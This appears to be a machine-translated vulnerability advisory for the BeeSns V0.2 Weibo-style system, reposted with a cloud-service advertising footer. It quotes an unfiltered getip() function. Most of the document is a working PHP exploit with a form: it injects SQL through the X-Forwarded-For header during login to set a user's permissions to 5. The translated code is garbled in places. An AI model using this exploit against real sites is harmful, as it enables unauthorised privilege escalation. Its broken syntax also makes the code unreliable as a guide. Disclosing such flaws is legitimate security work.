Release date: 2011-1.27
Author: Zi Yi
Affected Version: BeeSns V0.2
Official Address: http://www.beesns.com/
Vulnerability Description: IP address filtering is lax, which allows users to submit malicious parameters to improve their permissions.
This Weibo system has a good style. I personally like it. Check the code to find some problems. Check the Code directly.
01 // obtain the Client IP Address
02 functiongetip (){
03 if (isset ($ _ SERVER )){
04 if (isset ($ _ SERVER [HTTP_X_FORWARDED_FOR]) {
05 $ realip = $ _ SERVER [HTTP_X_FORWARDED_FOR];
06} elseif (isset ($ _ SERVER [HTTP_CLIENT_IP]) {
07 $ realip = $ _ SERVER [HTTP_CLIENT_IP];
08} else {
09 $ realip = $ _ SERVER [REMOTE_ADDR];
10}
11} else {
12 if (getenv ("HTTP_X_FORWARDED_FOR ")){
13 $ realip = getenv ("HTTP_X_FORWARDED_FOR ");
14} elseif (getenv ("HTTP_CLIENT_IP ")){
15 $ realip = getenv ("HTTP_CLIENT_IP ");
16} else {
17 $ realip = getenv ("REMOTE_ADDR ");
18}
19}
20 $ iphide = explode (".", $ realip );
21
22 $ realip = "$ iphide [0]. $ iphide [1]. $ iphide [2]. $ iphide [3]"; //! I don't understand what the author wrote. The IP address is not filtered and vulnerabilities are generated.
23 return $ realip;
24}
This vulnerability is completely YY. --!
EXP:
01 <? Php
02 print_r (
03 + --------------------------------------------------------------------------- + <br>
04 BeeSns v0.2 Getip () Remote SQL Injection Exploit <br>
05 site: www.beesns.com <br>
06 by sub-meter <br>
07 Blog: http://www.zyday.com <br>
08
09 + --------------------------------------------------------------------------- + <br> );
10
11 if (empty ($ _ POST [submit]) {
12} else {
13 error_reporting (7 );
14 ini_set (max_execution_time, 0 );
15 $ host = $ _ POST [host];
16 $ path = $ _ POST [path];
17 $ username = $ _ POST [username];
18 $ password =$ _ POST [password];
19 send ();
20}
21 <! -- More -->
22
23 functionsend ()
24 {
25 global $ host, $ path, $ username, $ password;
26
27 $ cmd = "uId =". $ username. "& uPw =". $ password;
28 $ getinj = "1.1.1.1, permissions = 5 where uid = $ username #";
29 $ data = "POST". $ path. "post. php? Act = userLogin HTTP/1.1 ";
30 $ data. = "Accept :*/*";
31 $ data. = "Accept-Language: zh-cn ";
32 $ data. = "Content-Type: application/x-www-form-urlencoded ";
33 $ data. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1 )";
34 $ data. = "Host: $ host ";
35 $ data. = "Content-Length:". strlen ($ cmd )."";
36 $ data. = "Connection: Close ";
37 $ data. = "X-Forwarded-For: $ getinj ";
38 $ data. = $ cmd;
39
40 $ fp = fsockopen ($ host, 80 );
41 fputs ($ fp, $ data );
42
43 $ resp =;
44
45 while ($ fp &&! Feof ($ fp ))
46 $ resp. = fread ($ fp, 1024 );
47
48 if (preg_match (# (. *) charset = UTF-8 (. *) 1 (. *) 1 (. *) 0 (. *) # Uis, $ resp )){
49 echo "<br> <font color = green> the permission is successfully upgraded! </Font> ";
50} else {
51 echo "<font color = red> Failed! </Font> ";
52}
53
54}
55?>
56 <form action = method = POST>
57 target address: <input type = inputname = hostvalue = www.zyday.com> * do not add <a href = "http ://
58 level-2 Directory: <input type = inputname = pathvalue =/> * if it is not a level-2 Directory, keep the default value. <br>
59 User name: <input type = inputname = username> * User name applied for on the target site. <font color = red> we recommend that you use a trumpet test. </font> <br>
60 password: <input type = inputname = password> <br>
61 <input type = submitname = submitvalue = Privilege Escalation> <br>
62 </form>
Fix: IP address filtering
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
